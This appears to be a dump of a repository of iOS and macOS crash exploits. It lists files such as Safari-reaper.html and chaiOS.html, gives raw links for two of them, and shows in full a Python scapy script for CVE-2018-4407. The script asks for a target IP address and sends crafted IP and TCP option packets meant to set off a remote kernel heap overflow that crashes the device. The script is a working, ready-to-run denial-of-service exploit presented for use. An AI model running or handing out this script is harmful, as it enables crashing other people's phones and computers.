├── CVE-2018-4407.py ├── EffectivePower.txt ├── Honey.mp4 ├── README.md ├── Safari-reaper.html ├── Telugu.txt ├── Zalgo.txt └── chaiOS.html /CVE-2018-4407.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from scapy.all import * 3 | from contextlib import contextmanager, redirect_stdout 4 | 5 | @contextmanager 6 | def suppress_stdout(): 7 | with open(os.devnull, "w") as devnull: 8 | with redirect_stdout(devnull): 9 | yield 10 | print("[CVE-2018-4407]: Remote Kernel Heap Overflow") 11 | ip = input("Enter iOS 12 / OS X IP address: ") or 0 12 | if(ip!=0): 13 | print("[*] Sending crafted payload to "+ ip) 14 | for i in range(8,40): 15 | with suppress_stdout(): 16 | send(IP(dst=ip,options=[IPOption("A"*i)])/TCP(dport=62078,options=[(19, "1"*18),(19, "2"*18)])) 17 | send(IP(dst=ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)])) -------------------------------------------------------------------------------- /EffectivePower.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Crash-iOS-Exploit/9e334dde1c747ddfdca02c67cfc916b06fb69b97/EffectivePower.txt -------------------------------------------------------------------------------- /Honey.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Crash-iOS-Exploit/9e334dde1c747ddfdca02c67cfc916b06fb69b97/Honey.mp4 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |